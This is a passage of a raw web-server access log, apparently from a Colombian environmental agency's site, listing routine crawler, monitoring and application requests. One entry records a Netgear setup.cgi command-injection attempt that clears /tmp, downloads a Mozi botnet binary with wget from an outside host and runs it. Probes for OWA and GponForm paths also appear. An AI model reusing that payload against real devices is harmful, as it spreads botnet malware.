GU9Lz3QSiCvr7iJM9rB4H3I4w+SCiyeTKi7iN2Sow/r4+U6p9KFoxD4+KVz87b1IsFIwD4m9DUFkiCyH4apUw+oYSAE89pAgbj3RHzBsA6CdIkoPYERwXObcWKscU+f+1dEoC+PwFVCdUlqTWJEtAYL7UzVMpvKQyfs45s+o9LLOCjzTpMR6JvCveEffoaGJb3PgNbKqknsKnrOeeoIUQ/BSqtxV2Ha4c5sxzW6Ts2+3lUTkxUYSvNFv0e/DMO3is=&u=U2FsdGVkX1/O3hh2ngzYvmpSiNwyZSD9bthbO5XCwg2Jg9Qu1xWWyuL1e0dawjmi&y=U2FsdGVkX19DRKmA7YScCGquq1VgQDCCIwBsWY0qu0StyA8tIXFlUyD9nVQgpaYi HTTP/1.1" 200 1703
186.29.111.88 - - [11/Apr/2022:01:10:46 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19HHWlXH7PA+P/sAzRaInhIunihJVI90DbzULpi8ZfCk0fOJxkZFimz&u=U2FsdGVkX1/O3hh2ngzYvmpSiNwyZSD9bthbO5XCwg2Jg9Qu1xWWyuL1e0dawjmi&y=U2FsdGVkX19DRKmA7YScCGquq1VgQDCCIwBsWY0qu0StyA8tIXFlUyD9nVQgpaYi HTTP/1.1" 200 70
186.29.111.88 - - [11/Apr/2022:01:10:47 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19Fy/5/FslwagaVDBnCZ5N3MXctnXhSSsn9Xo+2dgWY/ZuAnY3YE+xb&u=U2FsdGVkX1/O3hh2ngzYvmpSiNwyZSD9bthbO5XCwg2Jg9Qu1xWWyuL1e0dawjmi&y=U2FsdGVkX19DRKmA7YScCGquq1VgQDCCIwBsWY0qu0StyA8tIXFlUyD9nVQgpaYi HTTP/1.1" 200 70
186.29.111.88 - - [11/Apr/2022:01:10:47 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/o74EQyi2BYp31AsOEZP5mzRucat/ZCAoZjpNDYz9tvXBIRJ5s94DZ&u=U2FsdGVkX1/O3hh2ngzYvmpSiNwyZSD9bthbO5XCwg2Jg9Qu1xWWyuL1e0dawjmi&y=U2FsdGVkX19DRKmA7YScCGquq1VgQDCCIwBsWY0qu0StyA8tIXFlUyD9nVQgpaYi HTTP/1.1" 200 70
186.29.111.88 - - [11/Apr/2022:01:10:47 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX199UWM14BPqjuPyim+Ld43htQ0VEDTmfiCZNXG6lDW3+50yDK/GRcsm&u=U2FsdGVkX1/O3hh2ngzYvmpSiNwyZSD9bthbO5XCwg2Jg9Qu1xWWyuL1e0dawjmi&y=U2FsdGVkX19DRKmA7YScCGquq1VgQDCCIwBsWY0qu0StyA8tIXFlUyD9nVQgpaYi HTTP/1.1" 200 70
186.29.111.88 - - [11/Apr/2022:01:10:47 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/ft5hFEcjYwInqSOlKG72WC0cbSaQHtFz/r1vESsQN2z8VVN1iX3Pf&u=U2FsdGVkX1/O3hh2ngzYvmpSiNwyZSD9bthbO5XCwg2Jg9Qu1xWWyuL1e0dawjmi&y=U2FsdGVkX19DRKmA7YScCGquq1VgQDCCIwBsWY0qu0StyA8tIXFlUyD9nVQgpaYi HTTP/1.1" 200 70
186.29.111.88 - - [11/Apr/2022:01:10:47 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/O0VETUy9rwEcIA48yVetZi8pyY4Nu/ppIqs5spBg7ZKoeUkSPTHjn&u=U2FsdGVkX1/O3hh2ngzYvmpSiNwyZSD9bthbO5XCwg2Jg9Qu1xWWyuL1e0dawjmi&y=U2FsdGVkX19DRKmA7YScCGquq1VgQDCCIwBsWY0qu0StyA8tIXFlUyD9nVQgpaYi HTTP/1.1" 200 70
186.29.111.88 - - [11/Apr/2022:01:10:47 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/L58HZWz3yenbt0zeBgrNZf4avG2KFi15zQakic4j8w45BJsXapH8b&u=U2FsdGVkX1/O3hh2ngzYvmpSiNwyZSD9bthbO5XCwg2Jg9Qu1xWWyuL1e0dawjmi&y=U2FsdGVkX19DRKmA7YScCGquq1VgQDCCIwBsWY0qu0StyA8tIXFlUyD9nVQgpaYi HTTP/1.1" 200 70
186.29.111.88 - - [11/Apr/2022:01:10:47 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+jolBD0VBP9qwHaGTxhZjbyWkmLeKb17/VmD9PbdU+j1gpcUWNXvZM&u=U2FsdGVkX1/O3hh2ngzYvmpSiNwyZSD9bthbO5XCwg2Jg9Qu1xWWyuL1e0dawjmi&y=U2FsdGVkX19DRKmA7YScCGquq1VgQDCCIwBsWY0qu0StyA8tIXFlUyD9nVQgpaYi HTTP/1.1" 200 70
186.29.111.88 - - [11/Apr/2022:01:10:47 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19rpE5+EvC8l+VeKewS6DXsk8tRDeuQufnbKtPdPEGzWUH/qLofEyVD9nUDHkzDhIuYDq5ewi1/4fFs3jok0W7kaS+wl+6AJ0oeUpAZw8EOLBWjpwPfBXfRhj5G2Jbd9yCcdbUUCoTuESKXOyLsaeIeCIQJ7nD4lVizYJWOlAORKnC0Nb1SLFD7pKXHGTM2AOSfHyztO2WSOiARPvZOp6LNedMvQNkUhcvmhiFdLzu6726HXd7ov/x/J7LIJ5BU9YC/k5vpUG1PyFUNq6HBm1sHL0mGejGX29s=&u=U2FsdGVkX1/O3hh2ngzYvmpSiNwyZSD9bthbO5XCwg2Jg9Qu1xWWyuL1e0dawjmi&y=U2FsdGVkX19DRKmA7YScCGquq1VgQDCCIwBsWY0qu0StyA8tIXFlUyD9nVQgpaYi HTTP/1.1" 200 176
186.29.111.88 - - [11/Apr/2022:01:10:47 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1/W/s3YAvoxrG4uTZU8NheGxm2fzAMlMh40bp6Mgf7jQgKJRUliIKfi HTTP/1.1" 200 30975
207.46.13.194 - - [11/Apr/2022:01:11:28 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [11/Apr/2022:01:09:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
39.67.167.246 - - [11/Apr/2022:01:11:39 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://39.67.167.246:55873/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 1019
216.245.221.92 - - [11/Apr/2022:01:12:33 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.179 - - [11/Apr/2022:01:15:31 -0500] "GET /forest/ HTTP/1.1" 200 12041
172.22.2.4 - - [11/Apr/2022:01:16:14 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/G__Jurisp.%20Junio%202014_ANALISIS%20JURISPRUDENCIA%20C-634-12%20DECOMISO.docx HTTP/1.1" 200 27045
172.22.2.4 - - [11/Apr/2022:01:14:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
152.61.192.232 - - [11/Apr/2022:01:17:06 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [11/Apr/2022:01:17:07 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [11/Apr/2022:01:17:07 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
172.22.2.4 - - [11/Apr/2022:01:15:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
216.245.221.92 - - [11/Apr/2022:01:17:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:01:21:07 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [11/Apr/2022:01:19:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61796
172.22.2.4 - - [11/Apr/2022:01:20:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [11/Apr/2022:01:22:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:01:21:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56669
201.245.192.253 - - [11/Apr/2022:01:22:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45436
49.7.21.74 - - [11/Apr/2022:01:23:51 -0500] "-" 408 -
201.245.192.253 - - [11/Apr/2022:01:23:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45451
152.61.128.50 - - [11/Apr/2022:01:25:50 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [11/Apr/2022:01:25:51 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [11/Apr/2022:01:25:52 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
216.245.221.92 - - [11/Apr/2022:01:27:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:01:26:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:01:27:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57542
172.22.2.4 - - [11/Apr/2022:01:31:27 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-146-16.docx HTTP/1.1" 304 -
207.46.13.157 - - [11/Apr/2022:01:31:58 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 342490
216.245.221.92 - - [11/Apr/2022:01:32:33 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Apr/2022:01:32:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45436
172.22.2.4 - - [11/Apr/2022:01:32:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [11/Apr/2022:01:33:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45451
172.22.2.4 - - [11/Apr/2022:01:33:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
216.245.221.92 - - [11/Apr/2022:01:37:33 -0500] "HEAD / HTTP/1.1" 200 -
186.29.111.88 - - [11/Apr/2022:01:37:39 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18NfVPtfrnKkclNcx+GdrYORQTLdUhiOT4zGfwcsfa4/oTmWO0DzdQZW4UONk+Il9Cj/0WQBDAOkRYJ9MX7k9d/newzJKpdTlgCI1oT4xl56Pj21W8PtcTgoMn57yepMiWAd9gWLSwLOyZIfj4CHQ0TvaI9nvcyszAxj0ETj/IxEsKispb15uQlyBjPDASWgUKUVqp3q4CBrGBusnUesdIHz5vE7/8S30SA9WVZ1q4MYl971cVYo7knjyGffeIDI5FjQyJ7F35gLA==&u=U2FsdGVkX1/O3hh2ngzYvmpSiNwyZSD9bthbO5XCwg2Jg9Qu1xWWyuL1e0dawjmi&y=U2FsdGVkX19DRKmA7YScCGquq1VgQDCCIwBsWY0qu0StyA8tIXFlUyD9nVQgpaYi HTTP/1.1" 200 25
186.29.111.88 - - [11/Apr/2022:01:37:39 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX1/O3hh2ngzYvmpSiNwyZSD9bthbO5XCwg2Jg9Qu1xWWyuL1e0dawjmi&y=U2FsdGVkX19DRKmA7YScCGquq1VgQDCCIwBsWY0qu0StyA8tIXFlUyD9nVQgpaYi HTTP/1.1" 200 25
186.29.111.88 - - [11/Apr/2022:01:37:39 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+ss1SDH4aIHW4yrOhHRoiyIzzrN59znJ5w3dn6tK7k7dOZf0FsZJ+3khU7cyxrVxnoDtEE7+QB8c4WuDg57dj7BLQVa5/Ss0FkxrNTBuEDidRqzqAcyMRLCKNabjPaLBrzvsBbAL1XOwPkgzB2aawjP8wR52Wd1EQ=&u=U2FsdGVkX1/O3hh2ngzYvmpSiNwyZSD9bthbO5XCwg2Jg9Qu1xWWyuL1e0dawjmi&y=U2FsdGVkX19DRKmA7YScCGquq1VgQDCCIwBsWY0qu0StyA8tIXFlUyD9nVQgpaYi HTTP/1.1" 200 25
186.29.111.88 - - [11/Apr/2022:01:37:39 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19u9mpVeEd1k8XshS5CWeB227A2ErPE0ksThG8GA3DLoNplxbyV7KVHfwWw3WzfHw1UPzmC7YczwobPoSh8VyqsYgdNMJkGr2WhEMUzmPEC649n80OsRPpYCpMVxWH+eDPNM20VoBWxLK0ytC6dZGbZxuEOAH2KuK4=&u=U2FsdGVkX1/O3hh2ngzYvmpSiNwyZSD9bthbO5XCwg2Jg9Qu1xWWyuL1e0dawjmi&y=U2FsdGVkX19DRKmA7YScCGquq1VgQDCCIwBsWY0qu0StyA8tIXFlUyD9nVQgpaYi HTTP/1.1" 200 25
186.29.111.88 - - [11/Apr/2022:01:37:40 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+vLzeAJuRfvDqkCqvt3oPNSVSZkCJ3N7yoVpJUGdGake59C7iooowfQqxYURui/H5O+UL4Y6lLPT3ixc8JLV6HgIqe/xe3bPi2NCvwRDvGWWan38E3rlKS4n27lSNOtrTlFH7Cwtt1k3I93Eqzvt0NmZbFJrohcNU=&u=U2FsdGVkX1/O3hh2ngzYvmpSiNwyZSD9bthbO5XCwg2Jg9Qu1xWWyuL1e0dawjmi&y=U2FsdGVkX19DRKmA7YScCGquq1VgQDCCIwBsWY0qu0StyA8tIXFlUyD9nVQgpaYi HTTP/1.1" 200 25
186.29.111.88 - - [11/Apr/2022:01:37:40 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19a2FKU9uorEwNtbvblqIom96MAd9dHFEANaghyKGRjHfH+OZZkSwBXbndmsQmPQe9RK73vpuG16AHyVBgO8CEmQJw7dYZbH4PwXO7F9HUetnInWuwGwBn82FGebjAyxdH6Cm5dcpY+SxG8Y5arJrlOidHlR3JtB8o44w4ppCEXqaoUsFokS23d&u=U2FsdGVkX1/O3hh2ngzYvmpSiNwyZSD9bthbO5XCwg2Jg9Qu1xWWyuL1e0dawjmi&y=U2FsdGVkX19DRKmA7YScCGquq1VgQDCCIwBsWY0qu0StyA8tIXFlUyD9nVQgpaYi HTTP/1.1" 200 25
172.22.2.4 - - [11/Apr/2022:01:38:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.65.17 - - [11/Apr/2022:01:40:32 -0500] "-" 408 -
172.22.2.4 - - [11/Apr/2022:01:39:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
216.245.221.92 - - [11/Apr/2022:01:42:33 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Apr/2022:01:42:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45436
201.245.192.253 - - [11/Apr/2022:01:43:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45451
172.22.2.4 - - [11/Apr/2022:01:44:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:01:44:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
216.245.221.92 - - [11/Apr/2022:01:47:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:01:49:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:01:50:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 40927
216.245.221.92 - - [11/Apr/2022:01:52:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:01:52:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56669
172.22.2.4 - - [11/Apr/2022:01:52:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57044
45.137.23.207 - - [11/Apr/2022:01:55:07 -0500] "GET / HTTP/1.1" 200 319
164.92.87.142 - - [11/Apr/2022:01:55:57 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [11/Apr/2022:01:55:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [11/Apr/2022:01:57:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:01:56:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
216.245.221.92 - - [11/Apr/2022:02:02:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:02:01:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:02:02:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
66.249.65.13 - - [11/Apr/2022:02:04:33 -0500] "-" 408 -
207.46.13.157 - - [11/Apr/2022:02:07:21 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 342490
216.245.221.92 - - [11/Apr/2022:02:07:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:02:07:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:02:08:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
172.22.2.4 - - [11/Apr/2022:02:10:03 -0500] "GET /BLA/boletinlegal/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 404 1018
49.7.21.74 - - [11/Apr/2022:02:10:32 -0500] "-" 408 -
207.46.13.209 - - [11/Apr/2022:02:12:13 -0500] "GET /bla/resoluciones/resoluciones%202016/1291.pdf HTTP/1.1" 200 489019
216.245.221.92 - - [11/Apr/2022:02:12:33 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.28 - - [11/Apr/2022:02:14:39 -0500] "GET /en-esta-navidad-bogota-esta-mejorando-con-mas-espacios-verdes-para-el-disfrute-de-la-ciudadania.html HTTP/1.1" 200 1114
172.22.2.4 - - [11/Apr/2022:02:13:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:02:14:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
216.245.221.92 - - [11/Apr/2022:02:17:33 -0500] "HEAD / HTTP/1.1" 200 -
45.137.23.205 - - [11/Apr/2022:02:18:17 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [11/Apr/2022:02:19:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:02:19:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
216.245.221.92 - - [11/Apr/2022:02:22:33 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [11/Apr/2022:02:22:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45435
201.245.192.253 - - [11/Apr/2022:02:23:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45437
172.22.2.4 - - [11/Apr/2022:02:24:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:02:25:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
216.245.221.92 - - [11/Apr/2022:02:27:33 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.199 - - [11/Apr/2022:02:30:07 -0500] "GET /bla/resoluciones/resoluciones%202016/0434.pdf HTTP/1.1" 200 768345
172.22.2.4 - - [11/Apr/2022:02:31:38 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [11/Apr/2022:02:30:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [11/Apr/2022:02:32:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:02:31:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53344
172.22.2.4 - - [11/Apr/2022:02:31:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53739
20.36.244.102 - - [11/Apr/2022:02:33:15 -0500] "GET /noticias/rssambiente.php HTTP/1.1" 406 -
201.245.192.253 - - [11/Apr/2022:02:32:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45435
201.245.192.253 - - [11/Apr/2022:02:33:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45437
216.245.221.92 - - [11/Apr/2022:02:37:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:02:36:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:02:37:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
216.245.221.92 - - [11/Apr/2022:02:42:33 -0500] "HEAD / HTTP/1.1" 200 -
3.86.182.118 - - [11/Apr/2022:02:43:31 -0500] "HEAD /en-semana-santa-no-uses-palmas-ni-traigas-o-consumas-animales-silvestres.html HTTP/1.1" 200 -
201.245.192.253 - - [11/Apr/2022:02:42:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45435
172.22.2.4 - - [11/Apr/2022:02:42:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.199 - - [11/Apr/2022:02:44:18 -0500] "GET /bla/resoluciones/resoluciones%202016/2501.pdf HTTP/1.1" 200 497417
201.245.192.253 - - [11/Apr/2022:02:43:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45437
172.22.2.4 - - [11/Apr/2022:02:43:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
216.245.221.92 - - [11/Apr/2022:02:47:33 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:02:47:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
66.249.65.13 - - [11/Apr/2022:02:48:12 -0500] "-" 408 -
207.46.13.209 - - [11/Apr/2022:02:48:27 -0500] "GET /bla/resoluciones/autos%202020/0055.pdf HTTP/1.1" 200 275592
172.22.2.4 - - [11/Apr/2022:02:48:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:02:49:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
192.241.223.210 - - [11/Apr/2022:02:50:44 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [11/Apr/2022:02:52:33 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.111 - - [11/Apr/2022:02:52:41 -0500] "GET /images/acopiadores-llantas-control-2-abril.jpeg HTTP/1.1" 200 34334
172.22.2.4 - - [11/Apr/2022:02:52:43 -0500] "POST /BLA/boletinlegal/GponForm/diag_Form?style/ HTTP/1.1" 404 1015
173.252.107.20 - - [11/Apr/2022:02:52:43 -0500] "GET /images/operativos-control-residuos-hospitalarios-4-abril.jpeg HTTP/1.1" 200 58998
173.252.107.20 - - [11/Apr/2022:02:52:49 -0500] "GET /images/llantas-teusaquillo-1-abril.jpg HTTP/1.1" 200 50674
69.63.189.116 - - [11/Apr/2022:02:52:49 -0500] "GET /images/interpretes-humedales-principal-26-marzo.jpg HTTP/1.1" 200 40211
69.171.251.4 - - [11/Apr/2022:02:52:50 -0500] "GET /images/operativos-control-residuos-hospitalarios-28-marzo.jpg HTTP/1.1" 200 36883
173.252.107.117 - - [11/Apr/2022:02:52:56 -0500] "GET /images/dia-agua-participantes-22-marzo.jpg HTTP/1.1" 200 53143
69.171.251.118 - - [11/Apr/2022:02:52:56 -0500] "GET /images/rueda-prensa-lluvias-secretaria-principal-23-marzo.jpg HTTP/1.1" 200 42664
66.249.65.13 - - [11/Apr/2022:02:53:56 -0500] "-" 408 -
49.7.21.74 - - [11/Apr/2022:02:54:06 -0500] "-" 408 -
207.46.13.199 - - [11/Apr/2022:02:54:09 -0500] "GET /bla/resoluciones/resoluciones%202016/2577.pdf HTTP/1.1" 200 356833
207.46.13.157 - - [11/Apr/2022:02:54:35 -0500] "GET /BLA/resoluciones/AUTOS%202020/3015.pdf HTTP/1.1" 200 347392
172.22.2.4 - - [11/Apr/2022:02:54:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [11/Apr/2022:02:54:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
